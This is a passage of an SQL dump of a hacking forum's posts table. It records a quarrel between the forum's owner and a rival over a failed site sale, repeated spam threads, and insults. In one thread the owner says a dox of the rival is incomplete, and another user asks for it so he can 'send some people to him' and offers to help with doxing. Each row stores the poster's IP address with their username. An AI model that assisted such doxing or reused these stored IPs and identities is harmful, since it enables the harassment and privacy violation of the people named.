'0', '1', 'dd0cda06f982e3009b4f6987e9d33c27', '0', '0'); INSERT INTO mybb_posts VALUES('3830', '750', '3828', '3', 'RE: Leaving', '0', '232', 'BreShiE', '1349653802', 'You\'ll regret this decision, trust me. I used to like AF, but you\'ll come to learn how bad it is.', '78.149.68.187', '1318405307', '0', '0', '0', '0', '1', '2e38881e20e3c25085d4eba56acac54e', '0', '0'); INSERT INTO mybb_posts VALUES('3831', '750', '3828', '3', 'RE: Leaving', '0', '82', 'iTzIpod', '1349654057', 'Well. I kinda made my decision. But who knows? I sometimes do stupid things when I\'m in a bad mood.. Might change my mind tomorrow or so.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c51f8aa6db15f9fcc8a0cb522d5021f5', '0', '0'); INSERT INTO mybb_posts VALUES('3832', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349654099', 'You told me on Skype about this. You accused me of doing those actions earlier today.\nAnd now you\'re acting like I had nothing to do with this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '38ed36c78563e3cdcff44fa61297884c', '0', '0'); INSERT INTO mybb_posts VALUES('3833', '743', '3792', '23', 'RE: I got a virus', '0', '82', 'iTzIpod', '1349654135', 'I think I got this taken care of. I\'m not sure though. I may be wrong.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e46f01624155e1508547f6b7e8f3531', '0', '0'); INSERT INTO mybb_posts VALUES('3834', '751', '0', '19', '[Junk]Regarding L33tforums.net', '0', '243', 'Anarchy $ucks', '1349654543', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'bb5352cbac323b4d097d6c350d502acf', '0', '0'); INSERT INTO mybb_posts VALUES('3835', '752', '0', '19', '[Junk]t3h jok3r is a scammer', '0', '243', 'Anarchy $ucks', '1349654582', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '60bc6ada8c5a6bfe6f7dbcbb7f63db89', '0', '0'); INSERT INTO mybb_posts VALUES('3836', '751', '3834', '19', '[Junk]Regarding L33tforums.net', '0', '1', 't3h jok3r', '1349654599', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3837', '752', '3835', '19', '[Junk]t3h jok3r is a scammer', '0', '1', 't3h jok3r', '1349654609', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3838', '753', '0', '19', '[Junk]Your site owner', '0', '243', 'Anarchy $ucks', '1349654724', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'be1f06e94c35331d62ae5f7f2f06719a', '0', '0'); INSERT INTO mybb_posts VALUES('3839', '754', '0', '19', '[Junk]Your Site Owner', '0', '243', 'Anarchy $ucks', '1349654755', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '3a477315388a78ed519bf1ce46886de9', '0', '0'); INSERT INTO mybb_posts VALUES('3840', '747', '3832', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349654782', '[quote=\'iTzIpod\' pid=\'3832\' dateline=\'1349654099\']\nYou told me on Skype about this. You accused me of doing those actions earlier today.\nAnd now you\'re acting like I had nothing to do with this..\n[/quote]\n\nWell because you said it yourself in the \"This forum is dead\" thread in the VIP section. I thought you did it and I apologized for accusing you.', '72.231.24.165', '1223104677', '1', '0', '1', '1349654890', '1', '2ca540929167ccc9a39bb03f90ef4cab', '0', '1349654890'); INSERT INTO mybb_posts VALUES('3846', '755', '3845', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349655277', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3847', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '234', 'SamuelNguyen', '1349655523', 'wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)', '95.140.125.125', '1603042685', '0', '0', '0', '0', '1', '85cec3bdbe0d217d5568449f9e7f9054', '0', '0'); INSERT INTO mybb_posts VALUES('3848', '747', '3847', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349655694', '[quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\']\nwow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)\n[/quote]\n\nCurrently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.', '72.231.24.165', '1223104677', '1', '0', '1', '1349655725', '1', 'dc9c2635087cc0298c10c45529bf9dc7', '0', '1349655725'); INSERT INTO mybb_posts VALUES('3849', '747', '3848', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '234', 'SamuelNguyen', '1349655945', '[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\']\r\n[quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\']\r\nwow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)\r\n[/quote]\r\n\r\nCurrently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.\r\n[/quote]\r\n\r\nok thanks, if you need help doxing i can help', '95.140.125.125', '1603042685', '0', '0', '0', '0', '1', '6c7f0d05ab9b475b0c4b635719cc412b', '0', '0'); INSERT INTO mybb_posts VALUES('3842', '753', '3838', '19', '[Junk]Your site owner', '0', '1', 't3h jok3r', '1349655068', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3843', '754', '3839', '19', '[Junk]Your Site Owner', '0', '1', 't3h jok3r', '1349655068', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3845', '755', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349655220', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'c897798fe552593621503793ca4d4761', '0', '0'); INSERT INTO mybb_posts VALUES('3850', '747', '3848', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349656042', '[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\']\r\n[quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\']\r\nwow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)\r\n[/quote]\r\n\r\nCurrently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.\r\n[/quote]\r\n\r\nI hope English isn\'t your only language. :roflol:\r\nOnce again, we had absolutely nothing to do with your downtime or the removal of you on Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'ea5f5c4ee2e111c65c6c1278608dfb53', '0', '0'); INSERT INTO mybb_posts VALUES('3851', '756', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349656077', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'aa30c4487fba2933c12bb392eb26d552', '0', '0'); INSERT INTO mybb_posts VALUES('3852', '747', '3850', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349656495', '[quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\']\r\n[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\']\r\n[quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\']\r\nwow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)\r\n[/quote]\r\n\r\nCurrently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.\r\n[/quote]\r\n\r\nI hope English isn\'t your only language. :roflol:\r\nOnce again, we had absolutely nothing to do with your downtime or the removal of you on Google.\r\n[/quote]\r\nProve it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '57ed1f970fe03a3c71f283cbcbaa0894', '0', '0'); INSERT INTO mybb_posts VALUES('3853', '747', '3852', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349656687', '[quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\']\r\n[quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\']\r\n[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\']\r\n[quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\']\r\nwow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)\r\n[/quote]\r\n\r\nCurrently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.\r\n[/quote]\r\n\r\nI hope English isn\'t your only language. :roflol:\r\nOnce again, we had absolutely nothing to do with your downtime or the removal of you on Google.\r\n[/quote]\r\nProve it.\r\n[/quote]\r\n\r\nHow do I prove I didn\'t attack you? That makes no sense.\r\nI would have to find out who did.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'ede3f0b901b9b547ad05550bfce41fc3', '0', '0'); INSERT INTO mybb_posts VALUES('3854', '747', '3853', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349656866', '[quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\']\n[quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\']\n[quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\']\n[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\']\n[quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\']\nwow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)\n[/quote]\n\nCurrently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.\n[/quote]\n\nI hope English isn\'t your only language. :roflol:\nOnce again, we had absolutely nothing to do with your downtime or the removal of you on Google.\n[/quote]\nProve it.\n[/quote]\n\nHow do I prove I didn\'t attack you? That makes no sense.\nI would have to find out who did.\n[/quote]\nGo through your forums PMs and find who did it.\n\nAlso tell me do you have any other enemies online?', '72.231.24.165', '1223104677', '1', '0', '1', '1349656910', '1', '5c1527c76e6d02620e5baee1c0f0d86d', '0', '1349656910'); INSERT INTO mybb_posts VALUES('3855', '757', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349656973', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '84452c90b61fc7edc38a77ce434e3337', '0', '0'); INSERT INTO mybb_posts VALUES('3856', '747', '3854', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349657148', '[quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\']\r\n[quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\']\r\n[quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\']\r\n[quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\']\r\n[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\']\r\n\r\nCurrently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.\r\n[/quote]\r\n\r\nI hope English isn\'t your only language. :roflol:\r\nOnce again, we had absolutely nothing to do with your downtime or the removal of you on Google.\r\n[/quote]\r\nProve it.\r\n[/quote]\r\n\r\nHow do I prove I didn\'t attack you? That makes no sense.\r\nI would have to find out who did.\r\n[/quote]\r\nGo through your forums PMs and find who did it.\r\n\r\nAlso tell me do you have any other enemies online?\r\n[/quote]\r\n\r\nLets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up.\r\n\r\nNot only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '9a48dd5ccf8d4350236cc0ea369681cb', '0', '0'); INSERT INTO mybb_posts VALUES('3857', '747', '3856', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349657256', '[quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\']\r\n[quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\']\r\n[quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\']\r\n[quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\']\r\n[quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\']\r\n\r\nI hope English isn\'t your only language. :roflol:\r\nOnce again, we had absolutely nothing to do with your downtime or the removal of you on Google.\r\n[/quote]\r\nProve it.\r\n[/quote]\r\n\r\nHow do I prove I didn\'t attack you? That makes no sense.\r\nI would have to find out who did.\r\n[/quote]\r\nGo through your forums PMs and find who did it.\r\n\r\nAlso tell me do you have any other enemies online?\r\n[/quote]\r\n\r\nLets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up.\r\n\r\nNot only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us.\r\n[/quote]\r\n\r\nLol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6d07280523ea6b3f89d7e4ec967d2d5d', '0', '0'); INSERT INTO mybb_posts VALUES('3858', '747', '3857', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349657526', '[quote=\'t3h jok3r\' pid=\'3857\' dateline=\'1349657256\']\r\n[quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\']\r\n[quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\']\r\n[quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\']\r\n[quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\']\r\nProve it.\r\n[/quote]\r\n\r\nHow do I prove I didn\'t attack you? That makes no sense.\r\nI would have to find out who did.\r\n[/quote]\r\nGo through your forums PMs and find who did it.\r\n\r\nAlso tell me do you have any other enemies online?\r\n[/quote]\r\n\r\nLets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up.\r\n\r\nNot only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us.\r\n[/quote]\r\n\r\nLol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod.\r\n[/quote]\r\n\r\nYou must be on drugs.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'b0fd074a1ed3313be267023cb14797d0', '0', '0'); INSERT INTO mybb_posts VALUES('3859', '757', '3855', '19', 'RE: Site Owner', '0', '232', 'BreShiE', '1349657782', 'You got scammed, and you deserved it. Deal with it. Become a better person, and learn some more things before trying to be an administrator.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '1cfd60ee268d7eebd836834284507ffd', '0', '0'); INSERT INTO mybb_posts VALUES('3860', '747', '3858', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349657808', '[quote=\'Anarchy $ucks\' pid=\'3858\' dateline=\'1349657526\']\r\n[quote=\'t3h jok3r\' pid=\'3857\' dateline=\'1349657256\']\r\n[quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\']\r\n[quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\']\r\n[quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\']\r\n\r\nHow do I prove I didn\'t attack you? That makes no sense.\r\nI would have to find out who did.\r\n[/quote]\r\nGo through your forums PMs and find who did it.\r\n\r\nAlso tell me do you have any other enemies online?\r\n[/quote]\r\n\r\nLets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up.\r\n\r\nNot only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us.\r\n[/quote]\r\n\r\nLol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod.\r\n[/quote]\r\n\r\nYou must be on drugs.\r\n[/quote]\r\n\r\nIf your mom likes getting laid every night then yes I\'m on drugs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cf9fa3b2a93cda87f17d3afc62e7b5ee', '0', '0'); INSERT INTO mybb_posts VALUES('3861', '747', '3860', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349657882', '[quote=\'t3h jok3r\' pid=\'3860\' dateline=\'1349657808\']\r\n[quote=\'Anarchy $ucks\' pid=\'3858\' dateline=\'1349657526\']\r\n[quote=\'t3h jok3r\' pid=\'3857\' dateline=\'1349657256\']\r\n[quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\']\r\n[quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\']\r\nGo through your forums PMs and find who did it.\r\n\r\nAlso tell me do you have any other enemies online?\r\n[/quote]\r\n\r\nLets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up.\r\n\r\nNot only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us.\r\n[/quote]\r\n\r\nLol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod.\r\n[/quote]\r\n\r\nYou must be on drugs.\r\n[/quote]\r\n\r\nIf your mom likes getting laid every night then yes I\'m on drugs.\r\n[/quote]\r\n\r\nYou are an amazing site administrator. I will be sure to give you our site.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'c636147f51156ba721b0b85c10f23b4a', '0', '0'); INSERT INTO mybb_posts VALUES('3862', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '232', 'BreShiE', '1349657908', 'Anarchy, this forum is better than yours, end of. Stop making new accounts just because you have nothing better to do.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '9ee5aca6cc1989ebbcbde59784663595', '0', '0'); INSERT INTO mybb_posts VALUES('3863', '757', '3855', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349657928', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3864', '756', '3851', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349657941', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3865', '745', '3798', '59', 'RE: [Leak] Huge Folder of Ebooks', '0', '232', 'BreShiE', '1349657980', 'Thanks for these man, going to give them a read through. They look quite interesting.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', 'f49b4bbad404ae689636fd6f4dff3317', '0', '0'); INSERT INTO mybb_posts VALUES('3867', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349658345', 'Dam fuckin straight. Anarchy forums is shit compared to LH....LH rules and i will continue to be active on here through it all :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'f514427847215153cc3e04ab7fc529fe', '0', '0'); INSERT INTO mybb_posts VALUES('3868', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349658911', 'The site owner just threatened to contact my ISP. Hilarious.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '2439f41658015780ab1ba8a8e0ebbf4b', '0', '0'); INSERT INTO mybb_posts VALUES('3869', '758', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349658942', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.\r\n\r\n[b]Update:[/b]\r\n[quote=\'t3h jok3r\']\r\nYour staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn.\r\n[/quote]', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'cd6065cb4bcf67bbc4361c4243f445c1', '0', '0'); INSERT INTO mybb_posts VALUES('3870', '747', '3868', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '232', 'BreShiE', '1349658947', '[quote=\'Contact My ISP\' pid=\'3868\' dateline=\'1349658911\']\r\nThe site owner just threatened to contact my ISP. Hilarious.\r\n[/quote]\r\n\r\nStop making new accounts, you pathetic excuse of a human being.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '20aabf47c90f921a89f5db68f04ddce7', '0', '0'); INSERT INTO mybb_posts VALUES('3871', '759', '0', '7', 'Join the LH Skype Group!', '0', '214', 'Rave™', '1349658994', '[align=center] [size=xx-large] [color=#32CD32] L33THacking Skype Group! \r\n\r\n[/size][size=medium][/color][color=#00BFFF] To join the chat follow these steps: \r\n[spoiler]\r\nRequest:\r\n\r\nspushkin1\r\nor\r\nflamingworm\r\n[/spoiler]\r\n\r\n\r\n[/size][/color][color=#FF4500] Rules:\r\nDOX\'s MUST Be Deleted One Minute After Posting\r\nNo DDOSING\r\nNo Grabbing IPS\r\nNo JDB\'s\r\nNo Porn unless warned\r\n[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '214', '1349659288', '1', 'a978e740f51edab8476757e66b38b288', '0', '1349659288'); INSERT INTO mybb_posts VALUES('3872', '760', '0', '19', '[Junk]The Site Owner', '0', '243', 'Anarchy $ucks', '1349659096', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my 